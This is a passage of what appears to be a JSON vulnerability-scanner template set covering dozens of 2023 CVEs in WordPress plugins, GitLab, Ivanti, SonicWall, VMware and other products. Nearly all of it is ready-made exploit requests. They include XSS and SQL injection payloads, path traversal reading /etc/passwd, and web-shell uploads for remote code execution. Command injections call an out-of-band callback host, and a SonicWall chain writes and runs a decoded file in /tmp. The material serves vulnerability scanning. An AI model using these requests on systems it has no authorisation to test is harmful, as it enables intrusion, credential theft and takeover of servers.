session={{session}}\n"],"payloads":{"path":["1","2","3","4","5","6","7","9","10"],"session":["eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKFnng.XPeCvkBiP7rOv1PhgKZ8xkzi2jk","eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKFu3g.k_WNoBY1ouhQyOXa5UcYdjVVuq0","eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKG_fg.KalpJbMq1SZPCBuunG9-ycDX9HM","eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKG_zQ.FPiBfT39gn2slf--XZHsk0rByEY","eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKHAPQ.zRjwotMHJES3eW8fJH8F_5GlD-U"]},"attack":"clusterbomb","stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"database_name\":","\"configuration_method\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-20889","info":{"name":"VMware Aria Operations for Networks - Code Injection Information Disclosure Vulnerability","severity":"high"},"requests":[{"raw":["POST /api/auth/login HTTP/2\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\nX-Vrni-Csrf-Token: null\n\n{\"username\":\"{{username}}\",\"password\":\"{{password}}\",\"domain\":\"localdomain\"}\n","POST /api/pdfexport HTTP/2\nHost: {{Hostname}}\nX-Vrni-Csrf-Token: {{csrf}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFkpSYDWZ5w9YNjmh\n\n------WebKitFormBoundaryFkpSYDWZ5w9YNjmh\nContent-Disposition: form-data; name=\"{{randstr}}\"\n\n<!DOCTYPE HTML>\n<html>\n<head>\n<title>Test</title>\n</head>\n<body>\n<p data-vrni='vRealize'><style>@keyframes x{}</style><xss style=\"animation-name:x\" onwebkitanimationstart=\"eval(atob('{{base64(payload)}}'))\"></xss></p>\n</body>\n</html>\n------WebKitFormBoundaryFkpSYDWZ5w9YNjmh--\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns","http"]},{"type":"word","part":"header_2","words":["application/octet-stream"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["csrfToken\":\"([a-z0-9A-Z/+=]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-2122","info":{"name":"Image Optimizer by 10web < 1.0.26 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=iowd_settings&msg=1&iowd_tabs_active=generalry8uo%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.domain)%3Ef0cmo HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type, \"text/html\")","contains(body_2, \"<img src=a onerror=alert(document.domain)>\")","contains(body_2, \"Image optimizer\")"],"condition":"and"}]}]},{"id":"CVE-2023-0514","info":{"name":"Membership Database <= 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","POST /wp-admin/admin.php?page=member-database%2Flist_members.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=sort&where=id&operator=%3D&value=asd%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%2F%2F&sortBy=id&ascdesc=asc\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(body_2, \"Member Database\")"],"condition":"and"}]}]},{"id":"CVE-2023-24737","info":{"name":"PMB v7.4.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /pmb/admin/convert/export_z3950.php?command=search&query=%3Cscript%3Ealert(document.domain);%3C/script%3E=or HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["3@1=<script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-27587","info":{"name":"ReadToMyShoe - Generation of Error Message Containing Sensitive Information","severity":"medium"},"requests":[{"raw":["POST /api/add-article-by-text HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nContent-Type: application/json\n\n{\n  \"title\":\"Kernsicherheitstest\",\n  \"body\":\"Kernsicherheitstest\"\n}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains((body), 'https://texttospeech.googleapis.com/v1beta1/text:synthesize?key=REDACTED')"]},{"type":"word","words":["Caused by:","TTS request failed"],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2023-24278","info":{"name":"Squidex <7.4.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/squid.svg?title=Not%20Found&text=This%20is%20not%20the%20page%20you%20are%20looking%20for!&background=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Cimg%20src=%22&small"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","looking for!"],"condition":"and"},{"type":"word","part":"header","words":["image/svg+xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-27482","info":{"name":"Home Assistant Supervisor - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /api/hassio/app/.%252e/supervisor/info HTTP/1.1\nHost: {{Hostname}}\n","GET /api/hassio/app/.%09./supervisor/info HTTP/1.1 # Mitigation bypass 1\nHost: {{Hostname}}\n","GET /api/hassio_ingress/.%09./supervisor/info HTTP/1.1 # Mitigation bypass 2\nHost: {{Hostname}}\nX-Hass-Is-Admin:1\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["\"slug\":","\"name\":","\"ip_address\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-23492","info":{"name":"Login with Phone Number - Cross-Site Scripting","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=lwp_forgot_password&ID=<svg%20onload=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg onload=alert(document.domain)>","message\":\"Update password"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-36289","info":{"name":"Webkul QloApps 1.6.0 - Cross-site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nSubmitCreate=1&ajax=true&back=my-account&controller=authentication&email={{email}}&email_create={{email}}\"%20onmouseover=alert(document.domain)%20y=&token={{randstr}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onmouseover=alert(document.domain)","hasConfirmation"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-30777","info":{"name":"Advanced Custom Fields < 6.1.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=acf-post-type&post_status=%22style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"onanimationstart=alert(document.domain)//\")","contains(body_2, \"Advanced Custom Fields\")"],"condition":"and"}]}]},{"id":"CVE-2023-0948","info":{"name":"WordPress Japanized for WooCommerce <2.5.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=peachpay&tab=field&\"><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type, \"text/html\")","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(body_2, \"peachpay\")"],"condition":"and"}]}]},{"id":"CVE-2023-29298","info":{"name":"Adobe ColdFusion - Access Control Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}//CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["([0-9a-fA-F]{32},){2}[0-9a-fA-F]{32}"]},{"type":"dsl","dsl":["contains(content_type, \"text/html\")","status_code == 200","len(trim_space(body)) == 106"],"condition":"and"}]}]},{"id":"CVE-2023-39676","info":{"name":"PrestaShop fieldpopupnewsletter Module - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/modules/fieldpopupnewsletter/ajax.php?callback=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Invalid email"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-35844","info":{"name":"Lightdash version <= 0.510.3 Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/slack/image/slack-image{{repeat('%2F..', 3)}}%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-35885","info":{"name":"Cloudpanel 2 < 2.3.1 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /file-manager/ HTTP/1.1\nHost: {{Hostname}}\nCookie: clp-fm={{session}}\n","POST /file-manager/backend/makefile HTTP/1.1\nHost: {{Hostname}}\nCookie: clp-fm={{session}}\nContent-Type: application/x-www-form-urlencoded\n\nid=/htdocs/app/files/public/&name={{str1}}.php\n","POST /file-manager/backend/text HTTP/1.1\nHost: {{Hostname}}\nCookie: clp-fm={{session}}\nContent-Type: application/x-www-form-urlencoded\n\nid=/htdocs/app/files/public/{{str1}}.php&content=<?php echo \"{{str2}}\"; ?>\n","POST /file-manager/backend/permissions HTTP/1.1\nHost: {{Hostname}}\nCookie: clp-fm={{session}}\nContent-Type: application/x-www-form-urlencoded\n\nid=/htdocs/app/files/public/{{str1}}.php&permissions=0777\n","GET /{{str1}}.php HTTP/2\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["body_5 == str2"]}]}]},{"id":"CVE-2023-1020","info":{"name":"Steveas WP Live Chat Shoutbox <= 1.4.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=shoutbox-ajax-update-messages&last_timestamp=0)+UNION+ALL+SELECT+NULL,NULL,(SELECT+CONCAT(0x6338633630353939396633643833353264376262373932636633666462323562)),NULL,NULL,NULL,NULL,NULL--+&rooms%5B%5D=default\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["c8c605999f3d8352d7bb792cf3fdb25b","no_participation"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-3936","info":{"name":"Blog2Social < 7.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=blog2social&origin=publish_post&deletePostStatus=success&deletedPostsNumber=1<img+src+onerror%3Dalert%28document.domain%29> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Deleted 1<img src onerror=alert(document.domain)> posts"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-27292","info":{"name":"OpenCATS - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /index.php?m=settings&a=previewPage&url=https://oast.me HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","words":["<TITLE>Page Preview</TITLE>","<FRAME src=\"https://oast.me\">"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-29887","info":{"name":"Nuovo Spreadsheet Reader 0.5.11 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/spreadsheet-reader/test.php?File=../../../../../../../../../../../etc/passwd","{{BaseURL}}/nuovo/spreadsheet-reader/test.php?File=../../../../../../../../../../../etc/passwd"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-32563","info":{"name":"Ivanti Avalanche - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /Servlet/Skins HTTP/1.1\nHost: {{Hostname}}\nContent-Length: 333\nContent-Type: multipart/form-data; boundary=------------------------eacf31f23ac1829f\nConnection: close\n\n--------------------------eacf31f23ac1829f\nContent-Disposition: form-data; name=\"guid\"\n\n../../../Web/webapps/ROOT\n--------------------------eacf31f23ac1829f\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.jsp\"\n\n<%\nout.println(\"CVE-2023-32563\");\n%>\n--------------------------eacf31f23ac1829f--\n","GET /{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body_2","words":["CVE-2023-32563"]}]}]},{"id":"CVE-2023-33338","info":{"name":"Old Age Home Management System v1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /admin/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=vaday%27+or+1%3D1%23&password=password&submit=\n","GET /admin/dashboard.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"Change Password\")","contains(body_2, \"Old Age Home Management System|| Dashboard\")"],"condition":"and"}]}]},{"id":"CVE-2023-32243","info":{"name":"WordPress Elementor Lite 5.7.1 - Arbitrary Password Reset","severity":"critical"},"requests":[{"raw":["GET /wp-login.php HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-json/wp/v2/users/ HTTP/1.1\nHost: {{Hostname}}\n","GET /?rest_route=/wp/v2/users HTTP/1.1\nHost: {{Hostname}}\n","GET /feed/ HTTP/1.1\nHost: {{Hostname}}\n","GET /author-sitemap.xml HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=login_or_register_user&eael-resetpassword-submit=true&page_id=124&widget_id=224&eael-resetpassword-nonce={{nonce}}&eael-pass1={{password}}&eael-pass2={{password}}&rp_login={{wordpress-username}}\n"],"payloads":{"password":["{{randstr}}"]},"host-redirects":true,"max-redirects":2,"stop-at-first-match":true,"matchers":[{"type":"word","part":"body_6","words":["\"success\":true","\"data\":"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","part":"body_1","group":1,"regex":["nonce\":\"([0-9a-z]+)"],"internal":true},{"type":"json","part":"body","name":"wordpress-username","group":1,"json":[".[] | .slug",".[].name"],"internal":true},{"type":"regex","part":"body_4","name":"wordpress-username","group":1,"regex":["<dc:creator><!\\[CDATA\\[([A-Za-z]+)\\]\\]><\\/dc:creator>"],"internal":true},{"type":"regex","part":"body_5","name":"wordpress-username","group":1,"regex":["\\/author\\/([a-z-]+)\\/"],"internal":true}]}]},{"id":"CVE-2023-24735","info":{"name":"PMB 7.4.6 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pmb/opac_css/pmb.php?url=https://oast.me&hash={{md5('https://oast.me')}}"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2023-24243","info":{"name":"CData RSB Connect v22.0.8336 - Server Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%255c%255c{{interactsh-url}}%255cC$%255cbb"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2023-2252","info":{"name":"Directorist < 7.5.4 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=at_biz_dir&page=tools&step=2&file=%2Fetc%2Fpasswd&delimiter=%3B HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2825","info":{"name":"GitLab 16.0.0 - Path Traversal","severity":"high"},"requests":[{"raw":["GET /users/sign_in HTTP/1.1\nHost: {{Hostname}}\n","POST /users/sign_in HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAccept: */*\n\nuser%5Blogin%5D={{username}}&user%5Bpassword%5D={{password}}&authenticity_token={{token_1}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAccept: */*\n\ngroup%5Bparent_id%5D=&group%5Bname%5D={{data}}-1&group%5Bpath%5D={{data}}-1&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-2&group%5Bpath%5D={{data}}-2&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-3&group%5Bpath%5D={{data}}-3&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-4&group%5Bpath%5D={{data}}-4&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-5&group%5Bpath%5D={{data}}-5&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-6&group%5Bpath%5D={{data}}-6&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-7&group%5Bpath%5D={{data}}-7&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-8&group%5Bpath%5D={{data}}-8&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-9&group%5Bpath%5D={{data}}-9&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-10&group%5Bpath%5D={{data}}-10&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-11&group%5Bpath%5D={{data}}-11&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","@timeout: 15s\nPOST /projects HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nproject%5Bci_cd_only%5D=false&project%5Bname%5D=CVE-2023-2825&project%5Bselected_namespace_id%5D={{namespace_id}}&project%5Bnamespace_id%5D={{namespace_id}}&project%5Bpath%5D=CVE-2023-2825&project%5Bvisibility_level%5D=20&project%5Binitialize_with_readme=1&authenticity_token={{token_2}}\n","POST /{{data}}-1/{{data}}-2/{{data}}-3/{{data}}-4/{{data}}-5/{{data}}-6/{{data}}-7/{{data}}-8/{{data}}-9/{{data}}-10/{{data}}-11/CVE-2023-2825/uploads HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nX-CSRF-Token: {{x-csrf-token}}\nContent-Type: multipart/form-data; boundary=0ce2a9fbe06b6da89c138a35a1765ed6\n\n--0ce2a9fbe06b6da89c138a35a1765ed6\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}\"\n\n{{randstr}}\n--0ce2a9fbe06b6da89c138a35a1765ed6--\n","GET /{{data}}-1/{{data}}-2/{{data}}-3/{{data}}-4/{{data}}-5/{{data}}-6/{{data}}-7/{{data}}-8/{{data}}-9/{{data}}-10/{{data}}-11/CVE-2023-2825/uploads/{{upload-hash}}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"cookie-reuse":true,"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","words":["726f6f743a78"],"encoding":"hex"},{"type":"word","part":"header","words":["application/octet-stream","etc%2Fpasswd"],"condition":"and"}],"extractors":[{"type":"regex","name":"token_1","group":1,"regex":["name=\"authenticity_token\" value=\"([A-Za-z0-9_-]+)\""],"internal":true,"part":"body"},{"type":"regex","name":"token_2","group":1,"regex":["name=\"csrf\\-token\" content=\"([A-Z_0-9a-z-]+)\""],"internal":true,"part":"body"},{"type":"regex","name":"parent_id","group":1,"regex":["href=\"\\/groups\\/new\\?parent_id=([0-9]+)"],"internal":true,"part":"body"},{"type":"regex","name":"namespace_id","group":1,"regex":["ref=\"\\/projects\\/new\\?namespace_id=([0-9]+)"],"internal":true,"part":"body"},{"type":"regex","name":"x-csrf-token","group":1,"regex":["const headers = \\{\"X\\-CSRF\\-Token\":\"([a-zA-Z-0-9_]+)\""],"internal":true,"part":"body"},{"type":"regex","name":"upload-hash","group":1,"regex":["\"url\":\"\\/uploads\\/([0-9a-z]+)\\/"],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-26067","info":{"name":"Lexmark Printers - Command Injection","severity":"high"},"requests":[{"raw":["POST /cgi-bin/fax_change_faxtrace_settings HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nContent-Length: 49\n\nFT_Custom_lbtrace=$({{cmd}})\n"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, 'dns')","contains(body, 'Fax Trace Settings')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-23491","info":{"name":"Quick Event Manager < 9.7.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=qem_ajax_calendar&category=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains(body, \"<script>alert(document.domain)</script>\")","contains(body, \"qem_calendar\")"],"condition":"and"}]}]},{"id":"CVE-2023-3765","info":{"name":"MLflow Absolute Path Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax-api/2.0/mlflow-artifacts/artifacts?path=C:/"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"is_dir\":","\"path\":","\"files\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-30210","info":{"name":"OURPHP <= 7.2.0 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/client/manage/ourphp_tz.php?act=rt&callback=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","barmemCachedPercent","swapPercent"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-29622","info":{"name":"Purchase Order Management v1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername=test&password=test')+AND+(SELECT+4458+FROM+(SELECT(SLEEP(6)))JblN)+AND+('orQN'='orQN\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"text/html\")","contains(body, \"status\\\":\\\"incorrect\")"],"condition":"and"}]}]},{"id":"CVE-2023-38035","info":{"name":"Ivanti Sentry - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /mics/services/MICSLogService HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{{base64_decode('YwEAbQAYdXBsb2FkRmlsZVVzaW5nRmlsZUlucHV0TVMAB2NvbW1hbmRTAEw=')}}curl {{padding(oast,padstr,71)}}{{base64_decode('UwAGaXNSb290VHpOeg==')}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, 'isRunningTzz')","contains(interactsh_protocol, 'dns')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-34124","info":{"name":"SonicWall GMS and Analytics Web Services - Shell Injection","severity":"critical"},"requests":[{"raw":["GET /ws/msw/tenant/%27%20union%20select%20%28select%20ID%20from%20SGMSDB.DOMAINS%20limit%201%29%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%28select%20concat%28id%2C%20%27%3A%27%2C%20password%29%20from%20sgmsdb.users%20where%20active%20%3D%20%271%27%20order%20by%20issuperadmin%20desc%20limit%201%20offset%200%29%2C%27%27%2C%20%27%27%2C%20%27 HTTP/1.1\nHost: {{Hostname}}\nAuth: {\"user\": \"system\", \"hash\": \"{{base64(hex_decode(auth))}}\"}\n","GET /appliance/login HTTP/1.1\nHost: {{Hostname}}\n","POST /appliance/applianceMainPage HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=login&skipSessionCheck=0&needPwdChange=0&clientHash={{ md5(concat(servertoken,replace_regex(alias,\"^.*:\",\"\"))) }}&password={{replace_regex(alias,\"^.*:\",\"\")}}&applianceUser={{replace_regex(alias,\":.*$\",\"\")}}&appliancePassword=Nice%20Try&ctlTimezoneOffset=0\n","POST /appliance/applianceMainPage HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnum=3232150&action=file_system&task=search&item=application_log&criteria=*&width=500&searchFolder=%2Fopt%2FGMSVP%2Fetc%2F&searchFilter=appliance.jar%3Bbash+-c+PLUS%3d\\$\\(echo\\+-e\\+begin-base64\\+755\\+a\\\\\\\\nKwee\\\\\\\\n\\%3d\\%3d\\%3d\\%3d\\+\\|\\+uudecode\\+-o-\\)\\%3becho\\+-e\\+begin-base64\\+755\\+/tmp/.{{filename}}\\\\\\\\n{{replace(base64(callback),\"+\",\"${PLUS}\")}}\\\\\\\\n\\%3d\\%3d\\%3d\\%3d\\+|+uudecode+%3b/tmp/.{{filename}}%3brm+/tmp/.{{filename}}%3becho+\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["<title>SonicWall Universal Management Appliance</title>","<title>SonicWall Universal Management Host</title>"],"condition":"or"},{"type":"word","part":"interactsh_protocol","words":["dns"]}],"extractors":[{"type":"json","part":"body","internal":true,"name":"alias","group":1,"json":[".alias"]},{"type":"regex","part":"body","internal":true,"name":"servertoken","group":1,"regex":["getPwdHash.*,'([0-9]+)'"]}]}]},{"id":"CVE-2023-1890","info":{"name":"Tablesome < 1.0.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST 